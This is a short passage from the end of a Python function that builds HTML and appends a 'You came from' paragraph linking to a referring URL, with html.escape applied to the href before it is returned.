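        out.append('<p>You came from <a href="%s">%s</a></p>'
                   % (html.escape(href, quote=True), html.escape(href, quote=True)))
    return "\n".join(out)
```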